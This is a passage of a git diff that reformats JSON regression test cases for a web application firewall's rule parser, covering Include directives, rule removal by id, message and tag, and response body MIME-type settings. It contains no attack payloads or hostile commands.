"http_code": 200, "parser_error": "Rules error. File: test-cases/data/config_example3.txt. Line: 2. Column: 66. Expecting an action, got: ops \"id:1000,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example3.txt", "SecRule ARGS \"@missing_operator test\" \"id:19,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include - missing file", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - missing file", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rules error. File: config-include-bad.json. Line: 2. Column: 46. test-cases/data/config_example-ops.txt: Not able to open file." }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example-ops.txt", "SecRule ARGS \"@contains test\" \"id:19,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include - missing at include", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - missing at include", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rules error. File: test-cases/data/config_example-ops-include.txt. Line: 1. Column: 52. test-cases/data/config_example-not-exist.txt: Not able to open file." }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example-ops-include.txt", "SecRule ARGS \"@contains test\" \"id:19,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include - duplicate id", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Include - duplicate id", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Rule id: 40 is duplicated" }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example.txt", "Include test-cases/data/config_example.txt", diff --git a/test/test-cases/regression/config-include.json b/test/test-cases/regression/config-include.json index ab73de0760..ade9fa8d87 100644 --- a/test/test-cases/regression/config-include.json +++ b/test/test-cases/regression/config-include.json @@ -1,199 +1,219 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Include (1/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (1/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (2/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (2/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (3/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (3/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (4/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (4/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"test\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"test\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"", "Include test-cases/data/config_example2.txt" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (5/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (5/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "Include test-cases/data/config_example.txt", @@ -201,120 +221,132 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (6/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (6/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"test\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"test\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/config_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (7/8)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (7/8)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "parser_error":"Looking at: 'test-cases/data/conasdffig_example2.txt'" + "expected": { + "http_code": 200, + "parser_error": "Looking at: 'test-cases/data/conasdffig_example2.txt'" }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include test-cases/data/conasdffig_example2.txt", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Include (8/8) -- quoted with wildcard", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Include (8/8) -- quoted with wildcard", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"config_example2\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"config_example2\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "Include \"test-cases/data/config_ex*ple2.txt\"", "SecRule ARGS \"@contains test\" \"id:9,pass,t:trim\"" diff --git a/test/test-cases/regression/config-remove_by_id.json b/test/test-cases/regression/config-remove_by_id.json index 9f074420b8..969a881c2b 100644 --- a/test/test-cases/regression/config-remove_by_id.json +++ b/test/test-cases/regression/config-remove_by_id.json @@ -1,39 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveById (1/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveById (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by an SecRuleRemove directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by an SecRuleRemove directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveById 2", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", @@ -41,40 +45,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveById (2/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveById (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by an SecRuleRemove directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by an SecRuleRemove directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveById 1-3", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", @@ -82,40 +90,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveById (3/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveById (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by an SecRuleRemove directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by an SecRuleRemove directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveById 1 2-3", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/config-remove_by_msg.json b/test/test-cases/regression/config-remove_by_msg.json index 36cb3cab06..a2e7721597 100644 --- a/test/test-cases/regression/config-remove_by_msg.json +++ b/test/test-cases/regression/config-remove_by_msg.json @@ -1,39 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByMsg (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByMsg (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by a SecRuleRemoveByMsg directive." + "expected": { + "debug_log": "Skipped rule id '2'. Removed by a SecRuleRemoveByMsg directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByMsg tag123", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim,msg:'tag123'\"", @@ -41,40 +45,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByMsg (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByMsg (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '3'. Removed by a SecRuleRemoveByMsg directive." + "expected": { + "debug_log": "Skipped rule id '3'. Removed by a SecRuleRemoveByMsg directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByMsg whee", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/config-remove_by_tag.json b/test/test-cases/regression/config-remove_by_tag.json index 09681546ac..3809413e44 100644 --- a/test/test-cases/regression/config-remove_by_tag.json +++ b/test/test-cases/regression/config-remove_by_tag.json @@ -1,39 +1,43 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByTag (1/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByTag (1/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '2'. Removed by a SecRuleRemoveByTag directive" + "expected": { + "debug_log": "Skipped rule id '2'. Removed by a SecRuleRemoveByTag directive", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByTag tag123", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim,tag:tag123\"", @@ -41,40 +45,44 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleRemoveByTag (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleRemoveByTag (2/2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Skipped rule id '3'. Removed by a SecRuleRemoveByTag directive." + "expected": { + "debug_log": "Skipped rule id '3'. Removed by a SecRuleRemoveByTag directive.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleRemoveByTag whee", "SecRule ARGS \"@contains test\" \"id:1,pass,t:trim\"", "SecRule ARGS \"@contains test\" \"id:2,pass,t:trim\"", diff --git a/test/test-cases/regression/config-response_type.json b/test/test-cases/regression/config-response_type.json index 621ab38a20..c85e8c9e9c 100644 --- a/test/test-cases/regression/config-response_type.json +++ b/test/test-cases/regression/config-response_type.json @@ -1,128 +1,138 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyMimeType (1/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyMimeType (1/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"T \\(0\\) t:trim: \"no need.\"" + "expected": { + "debug_log": "T \\(0\\) t:trim: \"no need.\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", - "SecResponseBodyMimeType text\/plain text\/html text\/xml", + "SecResponseBodyMimeType text/plain text/html text/xml", "SecRule RESPONSE_BODY \"@contains RESPONSE_CONTENT_TYPE\" \"id:9,pass,t:trim,phase:4\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyMimeType (2/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyMimeType (2/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Response Content-Type is text/html. It is not marked to be inspected." + "expected": { + "debug_log": "Response Content-Type is text/html. It is not marked to be inspected.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", - "SecResponseBodyMimeType application\/something", + "SecResponseBodyMimeType application/something", "SecRule RESPONSE_BODY \"@contains RESPONSE_CONTENT_TYPE\" \"id:9,pass,t:trim,phase:4\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecResponseBodyMimeType (3/3)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecResponseBodyMimeType (3/3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + 